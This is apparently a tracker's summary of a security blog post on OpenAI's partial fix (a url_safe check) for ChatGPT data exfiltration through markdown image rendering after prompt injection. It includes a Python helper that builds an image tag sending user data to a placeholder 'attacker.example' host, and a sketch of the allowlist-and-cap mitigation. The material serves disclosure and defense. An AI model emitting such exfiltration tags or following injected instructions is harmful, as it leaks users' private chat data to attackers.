OpenAI Begins Tackling ChatGPT Data Leak Vulnerability
Summary
OpenAI has begun addressing a data exfiltration vulnerability (where attackers steal user data) in ChatGPT that abuses image markdown rendering during prompt injection attacks (tricking an AI by hiding instructions in its input). The company added a client-side validation check, called url_safe, to the web app that blocks images from suspicious domains. The fix is incomplete, however, and attackers can still leak small amounts of data through workarounds.
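To illustrate the exfiltration pattern described above, the sketch below shows how an injected prompt could coax the model into emitting a markdown image whose URL smuggles user data to an attacker-controlled server; when the client renders the image, the browser's request delivers the payload. The domain and helper name here are hypothetical, for illustration only.

```python
from urllib.parse import quote

def exfil_markdown(data: str, attacker_host: str = "attacker.example") -> str:
    """Build the markdown image tag an injected prompt would instruct the
    model to emit; rendering it makes the client fetch the URL, leaking
    `data` in the query string. attacker.example is a placeholder domain."""
    return f"![loading](https://{attacker_host}/log?q={quote(data)})"

print(exfil_markdown("user chat history snippet"))
```

Because the leak rides on an ordinary image fetch, no script execution is needed on the client; blocking the render (as url_safe does) is what breaks the channel.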
Solution / Mitigation
OpenAI's mitigation adds a client-side validation call (the url_safe endpoint) that checks whether an image URL is safe before rendering it; for malicious domains the check returns {"safe":false} and the image is not rendered. The source explicitly notes this is not a complete fix and suggests OpenAI should additionally "limit the number of images that are rendered per response to just one or maybe a handful maximum" to further reduce bypass techniques. The source also notes that the current iOS version, 1.2023.347 (16603), does not yet include these improvements.
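A minimal sketch of the mitigation logic, combining both ideas from the source: a url_safe-style check gates each image URL, and a per-response cap limits how many images render at all. This is a local stand-in, not OpenAI's actual implementation; the allowlisted hosts are assumptions for illustration.

```python
import re

MAX_IMAGES_PER_RESPONSE = 1  # the cap the source suggests as an extra defense
TRUSTED_HOSTS = {"openai.com", "oaiusercontent.com"}  # illustrative allowlist

def url_safe(url: str) -> dict:
    """Stand-in for the url_safe endpoint: returns {"safe": False} for
    hosts outside the allowlist so the client skips rendering them."""
    m = re.match(r"https://([^/]+)/", url + "/")
    host = m.group(1) if m else ""
    ok = any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS)
    return {"safe": ok}

def render_images(markdown: str) -> list[str]:
    """Return the image URLs the client would actually render:
    at most MAX_IMAGES_PER_RESPONSE, and only those passing url_safe."""
    urls = re.findall(r"!\[[^\]]*\]\((https://[^)]+)\)", markdown)
    rendered = []
    for u in urls:
        if len(rendered) >= MAX_IMAGES_PER_RESPONSE:
            break
        if url_safe(u)["safe"]:
            rendered.append(u)
    return rendered
```

Under this sketch, an attacker's image pointing at an untrusted host is dropped, and even allowlisted images stop at the cap, shrinking the per-response exfiltration bandwidth the source warns about.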
Original source: https://embracethered.com/blog/posts/2023/openai-data-exfiltration-first-mitigations-implemented/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 92%